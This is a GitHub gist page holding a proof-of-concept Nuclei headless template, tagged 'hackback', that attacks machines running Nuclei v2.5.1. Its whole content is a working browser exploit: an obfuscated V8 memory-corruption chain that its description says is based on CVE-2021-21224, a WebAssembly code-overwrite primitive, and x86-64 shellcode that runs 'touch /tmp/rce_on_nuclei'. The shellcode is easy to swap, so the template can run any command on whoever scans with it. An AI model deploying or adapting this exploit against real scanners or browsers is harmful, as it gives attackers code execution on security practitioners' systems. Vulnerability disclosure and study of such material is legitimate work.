Last active
September 7, 2024 08:39
-
-
Save c3l3si4n/88f750d20110ba603939b7473a8012ba to your computer and use it in GitHub Desktop.
POC demonstrating RCE on Nuclei v2.5.1. The following PoC will execute `touch /tmp/rce_on_nuclei`. JS exploit based on CVE-2021-21224 PoCs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: nuclei-rce | |
| info: | |
| name: Nuclei Template RCE by Chromium | |
| author: c3l3si4n | |
| severity: critical | |
| tags: rce,hackback | |
| headless: | |
| - steps: | |
| - args: | |
| url: "{{BaseURL}}" | |
| action: navigate | |
| - action: waitload | |
| - action: script | |
| name: poc | |
| args: | |
| code: | | |
| '\n' + (()=>{function gc(){for(var r=0;r<524288;++r)new ArrayBuffer}let shellcode=[72,184,47,98,105,110,47,115,104,0,153,80,84,95,82,102,104,45,99,84,94,82,232,25,0,0,0,116,111,117,99,104,32,47,116,109,112,47,114,99,101,95,111,110,95,110,117,99,108,101,105,0,86,87,84,94,106,59,88,15,5];var wasmCode=new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]),wasmModule=new WebAssembly.Module(wasmCode),wasmInstance=new WebAssembly.Instance(wasmModule),main=wasmInstance.exports.main,bf=new ArrayBuffer(8),bfView=new DataView(bf);function fLow(r){return bfView.setFloat64(0,r,!0),bfView.getUint32(0,!0)}function fHi(r){return bfView.setFloat64(0,r,!0),bfView.getUint32(4,!0)}function i2f(r,e){return bfView.setUint32(0,r,!0),bfView.setUint32(4,e,!0),bfView.getFloat64(0,!0)}function f2big(r){return bfView.setFloat64(0,r,!0),bfView.getBigUint64(0,!0)}function big2f(r){return bfView.setBigUint64(0,r,!0),bfView.getFloat64(0,!0)}class LeakArrayBuffer extends ArrayBuffer{constructor(r){super(r),this.slot=45887}}function foo(r){let e=-1;r&&(e=4294967295);var t=new Array(Math.sign(0-Math.max(0,e,-1)));t.shift();let a=Array(2);a[0]=5.1;let f=new LeakArrayBuffer(4096);return t[0]=4386,[t,a,f]}for(var i=0;i<65536;++i)foo(!1);function setbackingStore(r,e){rwarr[4]=i2f(fLow(rwarr[4]),r),rwarr[5]=i2f(e,fHi(rwarr[5]))}function leakObjLow(r){return corrupt_buff.slot=r,fLow(rwarr[9])-1}gc(),gc(),[corrput_arr,rwarr,corrupt_buff]=foo(!0),corrput_arr[12]=140356,delete corrput_arr;let corrupt_view=new DataView(corrupt_buff),corrupt_buffer_ptr_low=leakObjLow(corrupt_buff),idx0Addr=corrupt_buffer_ptr_low-16,baseAddr=(4294901760&corrupt_buffer_ptr_low)-(4294901760&corrupt_buffer_ptr_low)%262144+262144,delta=baseAddr+28-idx0Addr;if(delta%8==0){let r=delta/8;this.base=fLow(rwarr[r])}else{let r=(delta-delta%8)/8;this.base=fHi(rwarr[r])}let wasmInsAddr=leakObjLow(wasmInstance);setbackingStore(wasmInsAddr,this.base);let code_entry=corrupt_view.getFloat64(104,!0);setbackingStore(fLow(code_entry),fHi(code_entry));for(let r=0;r<shellcode.length;r++)corrupt_view.setUint8(r,shellcode[r]);main();})() + '\n' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Niceeee!